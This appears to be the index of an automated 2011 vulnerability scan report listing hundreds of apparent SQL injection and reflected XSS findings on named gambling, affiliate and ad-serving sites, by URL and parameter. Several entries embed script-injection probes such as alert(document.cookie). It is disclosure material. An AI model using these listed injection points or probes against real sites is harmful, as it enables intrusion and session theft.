XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 16 08:24:05 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. SQL injection

1.1. https://scratch.betsson.com/en/Casino/Disco-Keno [name of an arbitrarily supplied request parameter]

1.2. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya [User-Agent HTTP header]

1.3. https://scratch.betsson.com/en/Slots/Fantasia [site cookie]

1.4. https://scratch.betsson.com/en/Sports/Bowling [User-Agent HTTP header]

1.5. https://scratch.betsson.com/en/Sports/World-Champions [Referer HTTP header]

1.6. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 1]

1.7. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 2]

1.8. http://scratch.co.uk/resources/style.css [REST URL parameter 1]

1.9. http://scratch.co.uk/resources/style.css [REST URL parameter 2]

1.10. http://trk.primescratchcards.com/ [ac parameter]

1.11. http://www.interwetten.org/ [Referer HTTP header]

1.12. http://www.neogames.com/our-partners [name of an arbitrarily supplied request parameter]

1.13. http://www.neogames.com/outbound/article/www.bet365.com [name of an arbitrarily supplied request parameter]

2. LDAP injection

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

3.2. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

3.3. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

3.4. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

3.5. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

3.6. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

3.7. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

3.8. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

3.9. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

3.10. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

3.11. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

3.12. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

3.13. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

3.14. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

3.15. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

3.16. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

3.17. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

3.18. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

3.19. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

3.20. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

3.21. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

3.22. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

3.23. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

3.24. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.26. http://bid.openx.net/json [c parameter]

3.27. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

3.28. http://scratch.co.uk/ [currency parameter]

3.29. http://scratch.co.uk/ [currency parameter]

3.30. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [CUR parameter]

3.31. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [PRD parameter]

3.32. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [UNIQUEVISITORID parameter]

3.33. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [AR parameter]

3.34. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

3.35. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

3.36. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BO parameter]

3.37. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [PAR parameter]

3.38. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [RegistrationMode parameter]

3.39. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [SDN parameter]

3.40. http://trk.primescratchcards.com/ [ac parameter]

3.41. https://www.aspireaffiliates.com/ [CMI parameter]

3.42. https://www.aspireaffiliates.com/ [CMI parameter]

3.43. https://www.aspireaffiliates.com/ [CMI parameter]

3.44. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.45. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.46. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.47. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

3.48. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

3.49. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

3.50. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [CMI parameter]

3.51. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.52. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.53. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.54. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [name of an arbitrarily supplied request parameter]

3.55. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.56. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.57. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.58. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

3.59. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

3.60. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

3.61. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.62. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.63. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.64. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

3.65. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

3.66. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

3.67. http://www.bet365.com/home/ [name of an arbitrarily supplied request parameter]

3.68. http://www.bet365.com/home/default.asp [name of an arbitrarily supplied request parameter]

3.69. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]

3.70. http://www.okscratchcards.com/ [70343%27-alert(1)-%2789d3bb43680 parameter]

3.71. http://www.okscratchcards.com/ [name of an arbitrarily supplied request parameter]

3.72. http://www.okscratchcards.com/terms-and-conditions.aspx [& parameter]

3.73. http://www.okscratchcards.com/terms-and-conditions.aspx [name of an arbitrarily supplied request parameter]

3.74. http://www.primescratchcards.com/index.asp [curr parameter]

3.75. http://www.primescratchcards.com/index.asp [curr parameter]

3.76. http://ad.yieldmanager.com/imp [Referer HTTP header]

3.77. https://www.interwetten.com/sportsbook/registrationform.aspx [User-Agent HTTP header]

3.78. http://home.okscratchcards.com/AboutUs.aspx [BO cookie]

3.79. http://home.okscratchcards.com/AboutUs.aspx [RegistrationMode cookie]

3.80. http://home.okscratchcards.com/ContactUsMail.aspx [BO cookie]

3.81. http://home.okscratchcards.com/ContactUsMail.aspx [RegistrationMode cookie]

3.82. http://home.okscratchcards.com/FairPlay.aspx [BO cookie]

3.83. http://home.okscratchcards.com/FairPlay.aspx [RegistrationMode cookie]

3.84. http://home.okscratchcards.com/PlayersClub.aspx [BO cookie]

3.85. http://home.okscratchcards.com/PlayersClub.aspx [RegistrationMode cookie]

3.86. http://home.okscratchcards.com/Promotions.aspx [BO cookie]

3.87. http://home.okscratchcards.com/Promotions.aspx [RegistrationMode cookie]

3.88. http://home.okscratchcards.com/Responsible.aspx [BO cookie]

3.89. http://home.okscratchcards.com/Responsible.aspx [RegistrationMode cookie]

3.90. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [BO cookie]

3.91. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.92. http://home.okscratchcards.com/Terms.aspx [BO cookie]

3.93. http://home.okscratchcards.com/Terms.aspx [RegistrationMode cookie]

3.94. http://home.okscratchcards.com/help.aspx [BO cookie]

3.95. http://home.okscratchcards.com/help.aspx [RegistrationMode cookie]

3.96. http://okscratchcards.com/ [name of an arbitrarily supplied request parameter]

3.97. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

3.98. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

3.99. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

3.100. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

3.101. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

3.102. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

3.103. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

3.104. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

3.105. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

3.106. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

3.107. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

3.108. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

3.109. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

3.110. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

3.111. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

3.112. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

3.113. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

3.114. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

3.115. http://primescratchcards.com/images/bg.jpg [ARC cookie]

3.116. http://primescratchcards.com/images/bg.jpg [ARC cookie]

3.117. http://primescratchcards.com/images/bg.jpg [ARC cookie]

3.118. http://primescratchcards.com/images/contactus.asp [ARC cookie]

3.119. http://primescratchcards.com/images/contactus.asp [ARC cookie]

3.120. http://primescratchcards.com/images/contactus.asp [ARC cookie]

3.121. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

3.122. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

3.123. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

3.124. http://primescratchcards.com/images/help.asp [ARC cookie]

3.125. http://primescratchcards.com/images/help.asp [ARC cookie]

3.126. http://primescratchcards.com/images/help.asp [ARC cookie]

3.127. http://primescratchcards.com/images/index.asp [ARC cookie]

3.128. http://primescratchcards.com/images/index.asp [ARC cookie]

3.129. http://primescratchcards.com/images/index.asp [ARC cookie]

3.130. http://primescratchcards.com/images/media.asp [ARC cookie]

3.131. http://primescratchcards.com/images/media.asp [ARC cookie]

3.132. http://primescratchcards.com/images/media.asp [ARC cookie]

3.133. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

3.134. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

3.135. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

3.136. http://primescratchcards.com/images/promotions.asp [ARC cookie]

3.137. http://primescratchcards.com/images/promotions.asp [ARC cookie]

3.138. http://primescratchcards.com/images/promotions.asp [ARC cookie]

3.139. http://primescratchcards.com/images/terms.asp [ARC cookie]

3.140. http://primescratchcards.com/images/terms.asp [ARC cookie]

3.141. http://primescratchcards.com/images/terms.asp [ARC cookie]

3.142. http://primescratchcards.com/images/underage.asp [ARC cookie]

3.143. http://primescratchcards.com/images/underage.asp [ARC cookie]

3.144. http://primescratchcards.com/images/underage.asp [ARC cookie]

3.145. http://scratch.co.uk/ [affiliate cookie]

3.146. http://scratch.co.uk/ [affiliate cookie]

3.147. http://scratch.co.uk/ [currency cookie]

3.148. http://scratch.co.uk/ [currency cookie]

3.149. http://scratch.co.uk/ [currency cookie]

3.150. http://scratch.co.uk/ [currency cookie]

3.151. http://scratch.co.uk/ [lang cookie]

3.152. http://scratch.co.uk/ [lang cookie]

3.153. http://scratch.co.uk/ [neogamesemail cookie]

3.154. http://scratch.co.uk/about/ [affiliate cookie]

3.155. http://scratch.co.uk/about/ [currency cookie]

3.156. http://scratch.co.uk/about/ [lang cookie]

3.157. http://scratch.co.uk/contact/ [affiliate cookie]

3.158. http://scratch.co.uk/contact/ [currency cookie]

3.159. http://scratch.co.uk/contact/ [lang cookie]

3.160. http://scratch.co.uk/help/ [affiliate cookie]

3.161. http://scratch.co.uk/help/ [currency cookie]

3.162. http://scratch.co.uk/help/ [lang cookie]

3.163. http://scratch.co.uk/help/deposit/methods/ [affiliate cookie]

3.164. http://scratch.co.uk/help/deposit/methods/ [currency cookie]

3.165. http://scratch.co.uk/help/deposit/methods/ [lang cookie]

3.166. http://scratch.co.uk/help/fairplay/ [affiliate cookie]

3.167. http://scratch.co.uk/help/fairplay/ [currency cookie]

3.168. http://scratch.co.uk/help/fairplay/ [lang cookie]

3.169. http://scratch.co.uk/help/privacy/ [affiliate cookie]

3.170. http://scratch.co.uk/help/privacy/ [currency cookie]

3.171. http://scratch.co.uk/help/privacy/ [lang cookie]

3.172. http://scratch.co.uk/invite-friend/ [affiliate cookie]

3.173. http://scratch.co.uk/invite-friend/ [currency cookie]

3.174. http://scratch.co.uk/invite-friend/ [lang cookie]

3.175. http://scratch.co.uk/over-18/ [affiliate cookie]

3.176. http://scratch.co.uk/over-18/ [currency cookie]

3.177. http://scratch.co.uk/over-18/ [lang cookie]

3.178. http://scratch.co.uk/problem-gambling/ [affiliate cookie]

3.179. http://scratch.co.uk/problem-gambling/ [currency cookie]

3.180. http://scratch.co.uk/problem-gambling/ [lang cookie]

3.181. http://scratch.co.uk/promotions/ [affiliate cookie]

3.182. http://scratch.co.uk/promotions/ [currency cookie]

3.183. http://scratch.co.uk/promotions/ [lang cookie]

3.184. http://scratch.co.uk/promotions/argos/ [affiliate cookie]

3.185. http://scratch.co.uk/promotions/argos/ [currency cookie]

3.186. http://scratch.co.uk/promotions/argos/ [currency cookie]

3.187. http://scratch.co.uk/promotions/argos/ [lang cookie]

3.188. http://scratch.co.uk/terms/ [affiliate cookie]

3.189. http://scratch.co.uk/terms/ [currency cookie]

3.190. http://scratch.co.uk/terms/ [lang cookie]

3.191. http://scratch.co.uk/vis-club/ [affiliate cookie]

3.192. http://scratch.co.uk/vis-club/ [currency cookie]

3.193. http://scratch.co.uk/vis-club/ [lang cookie]

3.194. http://scratch.co.uk/winners/ [affiliate cookie]

3.195. http://scratch.co.uk/winners/ [currency cookie]

3.196. http://scratch.co.uk/winners/ [lang cookie]

3.197. http://www.bigmoneyscratch.com/AboutUs.aspx [BO cookie]

3.198. http://www.bigmoneyscratch.com/AboutUs.aspx [RegistrationMode cookie]

3.199. http://www.bigmoneyscratch.com/Affiliates.aspx [BO cookie]

3.200. http://www.bigmoneyscratch.com/Affiliates.aspx [RegistrationMode cookie]

3.201. http://www.bigmoneyscratch.com/ContactUsChat.aspx [BO cookie]

3.202. http://www.bigmoneyscratch.com/ContactUsChat.aspx [RegistrationMode cookie]

3.203. http://www.bigmoneyscratch.com/ContactUsFax.aspx [BO cookie]

3.204. http://www.bigmoneyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]

3.205. http://www.bigmoneyscratch.com/ContactUsMail.aspx [BO cookie]

3.206. http://www.bigmoneyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]

3.207. http://www.bigmoneyscratch.com/ContactUsTel.aspx [BO cookie]

3.208. http://www.bigmoneyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]

3.209. http://www.bigmoneyscratch.com/FAQ.aspx [BO cookie]

3.210. http://www.bigmoneyscratch.com/FAQ.aspx [RegistrationMode cookie]

3.211. http://www.bigmoneyscratch.com/FairPlay.aspx [BO cookie]

3.212. http://www.bigmoneyscratch.com/FairPlay.aspx [RegistrationMode cookie]

3.213. http://www.bigmoneyscratch.com/Help.aspx [BO cookie]

3.214. http://www.bigmoneyscratch.com/Help.aspx [RegistrationMode cookie]

3.215. http://www.bigmoneyscratch.com/Home.aspx [BO cookie]

3.216. http://www.bigmoneyscratch.com/Home.aspx [RegistrationMode cookie]

3.217. http://www.bigmoneyscratch.com/InviteFriend.aspx [BO cookie]

3.218. http://www.bigmoneyscratch.com/InviteFriend.aspx [RegistrationMode cookie]

3.219. http://www.bigmoneyscratch.com/Mobile.aspx [BO cookie]

3.220. http://www.bigmoneyscratch.com/Mobile.aspx [RegistrationMode cookie]

3.221. http://www.bigmoneyscratch.com/PlayersClub.aspx [BO cookie]

3.222. http://www.bigmoneyscratch.com/PlayersClub.aspx [RegistrationMode cookie]

3.223. http://www.bigmoneyscratch.com/Promotions.aspx [BO cookie]

3.224. http://www.bigmoneyscratch.com/Promotions.aspx [RegistrationMode cookie]

3.225. http://www.bigmoneyscratch.com/Responsible.aspx [BO cookie]

3.226. http://www.bigmoneyscratch.com/Responsible.aspx [RegistrationMode cookie]

3.227. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [BO cookie]

3.228. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.229. http://www.bigmoneyscratch.com/Terms.aspx [BO cookie]

3.230. http://www.bigmoneyscratch.com/Terms.aspx [RegistrationMode cookie]

3.231. http://www.bigmoneyscratch.com/UnderAge.aspx [BO cookie]

3.232. http://www.bigmoneyscratch.com/UnderAge.aspx [RegistrationMode cookie]

3.233. http://www.hopa.com/ [BO cookie]

3.234. http://www.hopa.com/ [RegistrationMode cookie]

3.235. http://www.info.crazyscratch.com/AboutUs.aspx [BO cookie]

3.236. http://www.info.crazyscratch.com/AboutUs.aspx [RegistrationMode cookie]

3.237. http://www.info.crazyscratch.com/ContactUsFax.aspx [BO cookie]

3.238. http://www.info.crazyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]

3.239. http://www.info.crazyscratch.com/ContactUsMail.aspx [BO cookie]

3.240. http://www.info.crazyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]

3.241. http://www.info.crazyscratch.com/ContactUsTel.aspx [BO cookie]

3.242. http://www.info.crazyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]

3.243. http://www.info.crazyscratch.com/FairPlay.aspx [BO cookie]

3.244. http://www.info.crazyscratch.com/FairPlay.aspx [RegistrationMode cookie]

3.245. http://www.info.crazyscratch.com/Help.aspx [BO cookie]

3.246. http://www.info.crazyscratch.com/Help.aspx [RegistrationMode cookie]

3.247. http://www.info.crazyscratch.com/InviteFriend.aspx [BO cookie]

3.248. http://www.info.crazyscratch.com/InviteFriend.aspx [RegistrationMode cookie]

3.249. http://www.info.crazyscratch.com/PlayersClub.aspx [BO cookie]

3.250. http://www.info.crazyscratch.com/PlayersClub.aspx [RegistrationMode cookie]

3.251. http://www.info.crazyscratch.com/Privacy.aspx [BO cookie]

3.252. http://www.info.crazyscratch.com/Privacy.aspx [RegistrationMode cookie]

3.253. http://www.info.crazyscratch.com/Promotions.aspx [BO cookie]

3.254. http://www.info.crazyscratch.com/Promotions.aspx [RegistrationMode cookie]

3.255. http://www.info.crazyscratch.com/Responsible.aspx [BO cookie]

3.256. http://www.info.crazyscratch.com/Responsible.aspx [RegistrationMode cookie]

3.257. http://www.info.crazyscratch.com/Terms.aspx [BO cookie]

3.258. http://www.info.crazyscratch.com/Terms.aspx [RegistrationMode cookie]

3.259. http://www.info.crazyscratch.com/UnderAge.aspx [BO cookie]

3.260. http://www.info.crazyscratch.com/UnderAge.aspx [RegistrationMode cookie]

3.261. http://www.karamba.com/ [BO cookie]

3.262. http://www.karamba.com/ [RegistrationMode cookie]

3.263. http://www.karamba.com/AboutUs.aspx [BO cookie]

3.264. http://www.karamba.com/AboutUs.aspx [RegistrationMode cookie]

3.265. http://www.karamba.com/FairPlay.aspx [BO cookie]

3.266. http://www.karamba.com/FairPlay.aspx [RegistrationMode cookie]

3.267. http://www.karamba.com/Help.aspx [BO cookie]

3.268. http://www.karamba.com/Help.aspx [RegistrationMode cookie]

3.269. http://www.karamba.com/Home.aspx [BO cookie]

3.270. http://www.karamba.com/Home.aspx [RegistrationMode cookie]

3.271. http://www.karamba.com/InviteFriend.aspx [BO cookie]

3.272. http://www.karamba.com/InviteFriend.aspx [RegistrationMode cookie]

3.273. http://www.karamba.com/PlayersClub.aspx [BO cookie]

3.274. http://www.karamba.com/PlayersClub.aspx [RegistrationMode cookie]

3.275. http://www.karamba.com/Privacy.aspx [BO cookie]

3.276. http://www.karamba.com/Privacy.aspx [RegistrationMode cookie]

3.277. http://www.karamba.com/Promotions.aspx [BO cookie]

3.278. http://www.karamba.com/Promotions.aspx [RegistrationMode cookie]

3.279. http://www.karamba.com/Responsible.aspx [BO cookie]

3.280. http://www.karamba.com/Responsible.aspx [RegistrationMode cookie]

3.281. http://www.karamba.com/Sitemap.aspx [BO cookie]

3.282. http://www.karamba.com/Sitemap.aspx [RegistrationMode cookie]

3.283. http://www.karamba.com/Terms.aspx [BO cookie]

3.284. http://www.karamba.com/Terms.aspx [RegistrationMode cookie]

3.285. http://www.karamba.com/UnderAge.aspx [BO cookie]

3.286. http://www.karamba.com/UnderAge.aspx [RegistrationMode cookie]

3.287. http://www.karamba.com/click/Karamba.com/ENG/Home/ [BO cookie]

3.288. http://www.karamba.com/click/Karamba.com/ENG/Home/ [RegistrationMode cookie]

3.289. http://www.mundirasca.com/ [BO cookie]

3.290. http://www.mundirasca.com/ [RegistrationMode cookie]

3.291. http://www.mundirasca.com/AboutUs.aspx [BO cookie]

3.292. http://www.mundirasca.com/AboutUs.aspx [RegistrationMode cookie]

3.293. http://www.mundirasca.com/ContactUsChat.aspx [BO cookie]

3.294. http://www.mundirasca.com/ContactUsChat.aspx [RegistrationMode cookie]

3.295. http://www.mundirasca.com/ContactUsFax.aspx [BO cookie]

3.296. http://www.mundirasca.com/ContactUsFax.aspx [RegistrationMode cookie]

3.297. http://www.mundirasca.com/ContactUsMail.aspx [BO cookie]

3.298. http://www.mundirasca.com/ContactUsMail.aspx [RegistrationMode cookie]

3.299. http://www.mundirasca.com/ContactUsTel.aspx [BO cookie]

3.300. http://www.mundirasca.com/ContactUsTel.aspx [RegistrationMode cookie]

3.301. http://www.mundirasca.com/FAQ.aspx [BO cookie]

3.302. http://www.mundirasca.com/FAQ.aspx [RegistrationMode cookie]

3.303. http://www.mundirasca.com/FairPlay.aspx [BO cookie]

3.304. http://www.mundirasca.com/FairPlay.aspx [RegistrationMode cookie]

3.305. http://www.mundirasca.com/Help.aspx [BO cookie]

3.306. http://www.mundirasca.com/Help.aspx [RegistrationMode cookie]

3.307. http://www.mundirasca.com/InviteFriend.aspx [BO cookie]

3.308. http://www.mundirasca.com/InviteFriend.aspx [RegistrationMode cookie]

3.309. http://www.mundirasca.com/PlayersClub.aspx [BO cookie]

3.310. http://www.mundirasca.com/PlayersClub.aspx [RegistrationMode cookie]

3.311. http://www.mundirasca.com/Promotions.aspx [BO cookie]

3.312. http://www.mundirasca.com/Promotions.aspx [RegistrationMode cookie]

3.313. http://www.mundirasca.com/Responsible.aspx [BO cookie]

3.314. http://www.mundirasca.com/Responsible.aspx [RegistrationMode cookie]

3.315. http://www.mundirasca.com/SecurityAndPrivacy.aspx [BO cookie]

3.316. http://www.mundirasca.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.317. http://www.mundirasca.com/Terms.aspx [BO cookie]

3.318. http://www.mundirasca.com/Terms.aspx [RegistrationMode cookie]

3.319. http://www.mundirasca.com/UnderAge.aspx [BO cookie]

3.320. http://www.mundirasca.com/UnderAge.aspx [RegistrationMode cookie]

3.321. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [BO cookie]

3.322. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [RegistrationMode cookie]

3.323. https://www.neogamespartners.com/ [CMI parameter]

3.324. https://www.neogamespartners.com/ [CMI parameter]

3.325. https://www.neogamespartners.com/ [CMI parameter]

3.326. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

3.327. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

3.328. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

3.329. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

3.330. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

3.331. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

3.332. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

3.333. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

3.334. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

3.335. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

3.336. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

3.337. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

3.338. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

3.339. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

3.340. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

3.341. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

3.342. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

3.343. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

3.344. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

3.345. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

3.346. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

3.347. http://www.primescratchcards.com/contactus.asp [ARC cookie]

3.348. http://www.primescratchcards.com/contactus.asp [ARC cookie]

3.349. http://www.primescratchcards.com/contactus.asp [ARC cookie]

3.350. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

3.351. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

3.352. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

3.353. http://www.primescratchcards.com/help.asp [ARC cookie]

3.354. http://www.primescratchcards.com/help.asp [ARC cookie]

3.355. http://www.primescratchcards.com/help.asp [ARC cookie]

3.356. http://www.primescratchcards.com/index.asp [ARC cookie]

3.357. http://www.primescratchcards.com/index.asp [ARC cookie]

3.358. http://www.primescratchcards.com/index.asp [ARC cookie]

3.359. http://www.primescratchcards.com/media.asp [ARC cookie]

3.360. http://www.primescratchcards.com/media.asp [ARC cookie]

3.361. http://www.primescratchcards.com/media.asp [ARC cookie]

3.362. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

3.363. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

3.364. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

3.365. http://www.primescratchcards.com/promotions.asp [ARC cookie]

3.366. http://www.primescratchcards.com/promotions.asp [ARC cookie]

3.367. http://www.primescratchcards.com/promotions.asp [ARC cookie]

3.368. http://www.primescratchcards.com/terms.asp [ARC cookie]

3.369. http://www.primescratchcards.com/terms.asp [ARC cookie]

3.370. http://www.primescratchcards.com/terms.asp [ARC cookie]

3.371. http://www.primescratchcards.com/underage.asp [ARC cookie]

3.372. http://www.primescratchcards.com/underage.asp [ARC cookie]

3.373. http://www.primescratchcards.com/underage.asp [ARC cookie]

3.374. http://www.scratch2cash.com/ [BO cookie]

3.375. http://www.scratch2cash.com/ [RegistrationMode cookie]

3.376. http://www.scratch2cash.com/AboutUs.aspx [BO cookie]

3.377. http://www.scratch2cash.com/AboutUs.aspx [RegistrationMode cookie]

3.378. http://www.scratch2cash.com/ContactUsMail.aspx [BO cookie]

3.379. http://www.scratch2cash.com/ContactUsMail.aspx [RegistrationMode cookie]

3.380. http://www.scratch2cash.com/FairPlay.aspx [BO cookie]

3.381. http://www.scratch2cash.com/FairPlay.aspx [RegistrationMode cookie]

3.382. http://www.scratch2cash.com/Help.aspx [BO cookie]

3.383. http://www.scratch2cash.com/Help.aspx [RegistrationMode cookie]

3.384. http://www.scratch2cash.com/Home.aspx [BO cookie]

3.385. http://www.scratch2cash.com/Home.aspx [RegistrationMode cookie]

3.386. http://www.scratch2cash.com/InviteFriend.aspx [BO cookie]

3.387. http://www.scratch2cash.com/InviteFriend.aspx [RegistrationMode cookie]

3.388. http://www.scratch2cash.com/PlayersClub.aspx [BO cookie]

3.389. http://www.scratch2cash.com/PlayersClub.aspx [RegistrationMode cookie]

